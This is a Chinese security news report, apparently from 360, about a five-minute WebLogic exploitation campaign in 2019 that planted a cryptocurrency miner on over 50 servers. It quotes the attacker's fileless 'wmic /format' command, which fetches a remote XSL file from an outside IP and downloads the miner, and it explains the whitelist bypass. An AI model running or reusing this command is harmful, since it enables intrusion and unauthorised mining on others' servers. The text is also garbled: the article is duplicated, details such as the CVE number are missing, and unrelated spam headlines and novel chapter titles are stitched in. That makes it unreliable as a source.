对抗杀软黑客使用新技术植入挖矿木马 发布时间:2019-08-15 12:26:29 对抗杀软!黑客使用新技术植入挖矿木马 360互联安全中心监控到有黑客团伙于今日凌晨对暴露在互联中的Weblogic服务端发起大规模攻击 。该黑客团伙使用Weblogic远程代码执行漏洞cve-攻击服务器,并利用最新攻击技术试图向服务器中植入挖矿木马。 攻击仅仅持续五分钟,受害服务器却超50台 根据360互联安全中心所监控到的情况,攻击开始于凌晨1点18分,结束于凌晨1点23分,持续时间只有五分钟。然而在这短短5分钟内,由于之前未对Weblogic服务端进行更新而遭到入侵的服务器数量超过50台。由于360安全卫士有效拦截其进一步攻击,黑客在1点23分之后停止攻击。图1展示了今日凌晨的攻击走势。 黑客使用最新无文件攻击技术对抗杀毒软件 黑客入侵服务器成功后,会执行如下命令:wmic os get /format:hxxp://149.28.76.165/l。该命令源于国外安全研究员Casey Smith在4月18日发现的最新无文件攻击技术(,可用于绕过Windows白名单限制。 wmic是WMI命令行,可以用来管理、操作WMI系统。用户能够通过wmic [wmicomand] /format:[filename]将wmi命令行的输出格式化到指定的xsl文件或者csv文件中。由于wmic设计上的逻辑错误,在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行,该利用思路与regsvr32执行sct文件中的脚本代码类似,可被用于绕过Windows白名单执行恶意代码。此外,xsl文件也可以被托管在远程服务器上,因此黑客可以利用wmic实现无文件攻击。图2展示hxxp://149.28.76.165/l内容,不难发现该xsl文件中嵌入恶意的js脚本代码,这段脚本代码将从hxxp://149.28.76.165/e下载挖矿木马到服务器中进行挖矿。 hxxp://149.28.76.165/l的内容 由于杀毒软件对一些经常被用于无文件攻击的白文件(例如:e,e)进行了封锁,黑客急需一个新的替代品实现无文件攻击,而wmic正好能够胜任这项工作。自从这项攻击技术问世以来,利用这项技术完成执行的攻击时有发生,本次攻击是该攻击技术第一次被大规模使用。 360安全卫士早已对此攻击方式进行拦截 这项攻击技术问世之后,360安全卫士就及时对其进行拦截,使用360安全卫士的用户完全不必担心。 宝宝健脾胃的药有哪些一岁宝宝脸发黄是什么原因调理小儿脾胃虚弱的药整肠生长期吃有依赖性吗便秘吃什么食物可以缓解整肠生作用功效是什么整肠生和肠炎宁有哪些不同 猜你会喜欢的 ABB:能源业务成增长新领域 北京一山洞内发现2具人体遗骸疑为8年前走 这个世界开挂了 第六百五十七章 妖树妖王?!(第十八更) 2016年四川省殡葬管理条例四川省殡葬管 死亡帝君 第1142章 轻视 换种思维做配套 志愿军入朝时敌我双方兵力和装备情况 帝玄天 第三百三十八章 炮烙之刑 访韩中国游客规模逐年激增汉语导游紧缺引发 海航收购伦敦路透社总部大楼 人民日报每当朝鲜时势波动中国就注入正能量 恒通卫浴好在哪该如何判断各种卫浴的好坏呢 猜你会喜欢的 重生做皇帝 885.灵脉信息【第三章】 武道大帝 第2826章 五色炫光晶 漫游诸天 第八十八章 怪蛇 赏花人 018.襟间花心上人9. 补天道 五二零 十八铜牛,八十一变 猎魔者的无限之旅 第1044章 终结之战 六 诸天万界 第七百二十八章 战鼓发威! 圣王 第一千三百三十五章 底蕴出动
对抗杀软!黑客使用新技术植入挖矿木马 360互联安全中心监控到有黑客团伙于今日凌晨对暴露在互联中的Weblogic服务端发起大规模攻击 。该黑客团伙使用Weblogic远程代码执行漏洞cve-攻击服务器,并利用最新攻击技术试图向服务器中植入挖矿木马。 攻击仅仅持续五分钟,受害服务器却超50台 根据360互联安全中心所监控到的情况,攻击开始于凌晨1点18分,结束于凌晨1点23分,持续时间只有五分钟。然而在这短短5分钟内,由于之前未对Weblogic服务端进行更新而遭到入侵的服务器数量超过50台。由于360安全卫士有效拦截其进一步攻击,黑客在1点23分之后停止攻击。图1展示了今日凌晨的攻击走势。 黑客使用最新无文件攻击技术对抗杀毒软件 黑客入侵服务器成功后,会执行如下命令:wmic os get /format:hxxp://149.28.76.165/l。该命令源于国外安全研究员Casey Smith在4月18日发现的最新无文件攻击技术(,可用于绕过Windows白名单限制。 wmic是WMI命令行,可以用来管理、操作WMI系统。用户能够通过wmic [wmicomand] /format:[filename]将wmi命令行的输出格式化到指定的xsl文件或者csv文件中。由于wmic设计上的逻辑错误,在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行,该利用思路与regsvr32执行sct文件中的脚本代码类似,可被用于绕过Windows白名单执行恶意代码。此外,xsl文件也可以被托管在远程服务器上,因此黑客可以利用wmic实现无文件攻击。图2展示hxxp://149.28.76.165/l内容,不难发现该xsl文件中嵌入恶意的js脚本代码,这段脚本代码将从hxxp://149.28.76.165/e下载挖矿木马到服务器中进行挖矿。 hxxp://149.28.76.165/l的内容 由于杀毒软件对一些经常被用于无文件攻击的白文件(例如:e,e)进行了封锁,黑客急需一个新的替代品实现无文件攻击,而wmic正好能够胜任这项工作。自从这项攻击技术问世以来,利用这项技术完成执行的攻击时有发生,本次攻击是该攻击技术第一次被大规模使用。 360安全卫士早已对此攻击方式进行拦截 这项攻击技术问世之后,360安全卫士就及时对其进行拦截,使用360安全卫士的用户完全不必担心。 宝宝健脾胃的药有哪些一岁宝宝脸发黄是什么原因调理小儿脾胃虚弱的药整肠生长期吃有依赖性吗便秘吃什么食物可以缓解整肠生作用功效是什么整肠生和肠炎宁有哪些不同